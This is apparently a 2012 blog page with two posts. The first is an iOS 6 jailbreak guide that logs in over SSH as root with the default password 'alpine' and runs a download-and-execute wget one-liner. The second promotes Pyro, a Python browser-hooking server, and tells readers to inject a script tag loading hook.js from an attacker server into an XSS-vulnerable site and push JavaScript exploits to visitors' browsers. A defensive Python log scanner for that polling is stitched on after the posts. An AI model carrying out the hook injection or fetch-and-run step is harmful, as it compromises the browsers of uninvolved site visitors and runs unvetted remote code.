Sep 20, 2012

Howto: Jailbreak iOS6

1. Download the iOS 6 firmware.
2. Install it on your iDevice.
3. Put the device into DFU mode.
4. Download RedSn0w 0.9.13dev4 from
5. Run RedSn0w, and click Extras > Select IPSW, then choose your iOS 6 firmware file.
6. Click Back, and then click Jailbreak. You will then see a dialogue box saying “preparing jailbreak data”, followed by a page with different options. Make sure to select Install SSH, and click Next.
7. When the jailbreak finishes, you will be back at the lock screen. Put your device into DFU mode.
8. Click Back, and then click Just boot. A pineapple logo should appear on your device, indicating a tethered boot. Once this step is completed you will be back at the lock screen. You may close RedSn0w.

To install Cydia on your updated device, follow these steps:
1. On your iOS device, go to Settings > Wi-Fi and click the arrow next to your connected Wi-Fi router. Find the IP address for your Wi-Fi connection. In my example, my IP is
2. Open the Terminal app on a computer connected to the same Wi-Fi network.
3. In the terminal, type: ssh root@ (be sure to change the IP address to match your iOS device’s IP)
4. It should connect after a few seconds and prompt you for your iOS device’s password. The password is alpine
5. Once connected, paste the following into the terminal:
wget -q -O /tmp/ && chmod 755 /tmp/ && /tmp/
6. Your iOS device should reboot, and Cydia will be installed. If you get any permission errors in the terminal, just ignore them.


If you like my blog, Please Donate Me

Sep 18, 2012

Pyro [Simple Python Browser Exploitation Framework]

Pyro -- A simple browser hooking server in Python
Pyro was designed to be the simplest possible hooking server, to serve as a demonstration and a starting point for more serious development.
To start using Pyro you require no external packages! Most modern Python installations should work fine!
To run: ./
You may want to edit 'command.js', as it will not work until its MD5 hash differs from the one it had when the server started. So:
Step 1)
Step 2)
inject <script src='http://yourserver.domain:port/hook.js'></script>
into some poor XSS-vulnerable site, and have it run in a browser
Step 3)
While the client asks for commands,
edit command.js with your favourite JS exploit
Step 4)
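
The polling described above ("the client asks for commands") is visible from the defender's side. The following is an added example, not part of Pyro or the original post: it scans web-proxy log lines for a client re-fetching the same script URL at short intervals. The log format, host names, thresholds and the cache-busting query string are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (timestamp, client, method, URL); not real traffic.
SAMPLE_LOG = """\
2012-09-18T10:00:00 10.0.0.5 GET http://shop.example/item?id=1
2012-09-18T10:00:01 10.0.0.5 GET http://hook.example:8000/hook.js
2012-09-18T10:00:05 10.0.0.5 GET http://hook.example:8000/command.js?t=1
2012-09-18T10:00:10 10.0.0.5 GET http://hook.example:8000/command.js?t=2
2012-09-18T10:00:15 10.0.0.5 GET http://hook.example:8000/command.js?t=3
2012-09-18T10:00:20 10.0.0.5 GET http://hook.example:8000/command.js?t=4
2012-09-18T10:00:25 10.0.0.5 GET http://hook.example:8000/command.js?t=5
2012-09-18T10:00:03 10.0.0.9 GET http://cdn.example/jquery.js
2012-09-18T10:20:03 10.0.0.9 GET http://cdn.example/jquery.js
"""

def find_polling(log_text, min_hits=5, window_s=60):
    """Return sorted (client, url, peak_hits) for .js URLs that one client
    fetched at least min_hits times inside any window of window_s seconds."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url = line.split()
        path = url.split("?", 1)[0]  # ignore cache-busting query strings
        if method == "GET" and path.endswith(".js"):
            seen[(client, path)].append(datetime.fromisoformat(ts))
    findings = []
    for (client, path), stamps in seen.items():
        stamps.sort()
        peak, start = 0, 0
        # Sliding window: shrink from the left until the span fits window_s.
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_hits:
            findings.append((client, path, peak))
    return sorted(findings)

if __name__ == "__main__":
    for client, url, hits in find_polling(SAMPLE_LOG):
        print(f"{client} fetched {url} {hits} times within 60s")
```

A single library include such as the jquery.js fetches stays below the threshold, while the repeated command.js requests from one client are reported.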
